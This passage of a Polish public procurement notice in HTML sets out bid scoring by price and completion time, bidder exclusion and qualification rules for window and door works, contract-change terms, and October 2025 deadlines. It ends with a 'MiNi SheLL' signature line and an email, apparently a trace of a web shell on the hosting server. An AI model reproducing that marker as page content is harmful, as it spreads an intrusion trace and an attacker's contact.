oceniona (punktowana) według następującego wzoru: <br/> Cena oferty najtańszej<br/> P1 = ---------------------------------------- x 100 x 60% przy czym 1 % = 1 pkt. <br/> Cena oferty ocenianej <br/> (P1 = ilość punktów w kryterium najniższa cena)<br/> Maksymalna ilość punktów w punktacji kryterium ceny wynosi 60.<br/>2)	P2 - termin wykonania - 40% - Dot. Część I, II i III zamówienia<br/>Zasady oceniania w kryterium „termin wykonania”. Maksymalny termin realizacji zamówienia został wyznaczony przez Zamawiającego na 15 grudnia 2025 r. Za skrócenie terminu wykonania robót budowlanych Zamawiający przyzna punkty zgodnie z następującą zasadą: <br/><br/>1.	Termin wykonania w dniach od 10 grudnia do 15 grudnia 2025 r. - 5 pkt<br/>2.	Termin wykonania w dniach od 4 grudnia do 9 grudnia 2025 r. - 15 pkt<br/>3.	Termin wykonania w dniach od 28 listopada do 3 grudnia 2025 r.	- 25 pkt<br/>4.	Termin wykonania w dniach od 21 listopada do 27 listopada 2025 r. - 40 pkt<br/><br/>(P2 = ilość punktów w kryterium termin wykonania)<br/>	Maksymalna ilość punktów do uzyskania w kryterium termin wykonania – 40 pkt.<br/>Oferty oceniane będą wg wzoru: <br/>P = P1 + P2<br/>gdzie: P – ilość punktów przyznanych ofercie w łącznej punktacji ocenianych kryteriów. <br/>P1 – ilość punktów przyznanych ofercie w kryterium ceny. <br/>P2 – ilość punktów przyznanych ofercie w kryterium termin wykonania <br/>Maksymalna ilość punktów w łącznej punktacji ocenianych kryteriów wynosi 100. Jako oferta najkorzystniejsza uznana zostanie ta, która otrzyma największą ilość punktów w łącznej punktacji ocenianych kryteriów. Obliczenia będą wykonywane z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Zdolności technicznej lub zawodowej:<br/>a)	Zamawiający wymaga, aby Wykonawcy składający ofertę wykazali się, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonaniem co najmniej dwóch roboty polegającej na:<br/>Część III – wymianie stolarki okiennej lub drzwiowej oraz zwartości prac nie mniejszej niż 90.000 zł netto.<br/>b)	Zatrudnia minimum dwóch pracowników wykonujących roboty budowlane. Najpóźniej na dzień zawarcia umowy złoży wykaz pracowników potwierdzający, że osoby te są zatrudnione na podstawie stosunku pracy zgodnie z Ustawą Prawo pracy.<br/>2) Sytuacji ekonomicznej lub finansowej:<br/>a)	Zamawiający uzna, że wykonawca znajduje się w sytuacji ekonomicznej lub finansowej zapewniającej należyte wykonanie zamówienia, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą:<br/>Część III – wymianie stolarki okiennej lub drzwiowej oraz zwartości prac nie mniejszej niż 90.000 zł brutto <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty. W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny ww. wykaz. <br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót wykonywanych wspólnie z innymi wykonawcami, wykaz robót o którym mowa w pkt. 6.2 ust. 1 lit. a)- załącznik nr 7 do SWZ, dotyczy robót w których wykonaniu wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy. <br/>b)	wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego na formularzu zgodnym z treścią załącznika nr 8 do SWZ, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i niezbędnych do wykonania zamówienia publicznego oraz informacją o podstawie do dysponowania tymi osobami.<br/>c)	dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia. W przypadku przedłożenia polisy, której składki są opłacane w ratach do dokumentu potwierdzającego posiadanie polisy należy przedłożyć potwierdzenie opłacenia wszystkich wymagalnych raty.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w ppkt<br/>1), składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty wykonają poszczególni wykonawcy.<br/>4) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>5) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty wykonają poszczególni wykonawcy<br/>6) Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót wykonywanych wspólnie z innymi wykonawcami,<br/>wykaz robót o którym mowa w pkt. 6.2 ust. 1 lit. a)- załącznik nr 6 do SWZ, dotyczy robót w których wykonaniu wykonawca<br/>ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu<br/>bezpośrednio uczestniczył lub uczestniczy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 3 do SWZ. <br/>- konieczności przedłużenia terminu wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:<br/>a)	siły wyższej np. klęski żywiołowej itp.,<br/>b)	złych warunków atmosferycznych (deszcze, silne wiatry, opady śniegu itp.), co uniemożliwi wykonywanie prac na zewnątrz budynku<br/>c)	wstrzymania robót przez Zamawiającego,<br/>Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-03 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma zakupowa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-03 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com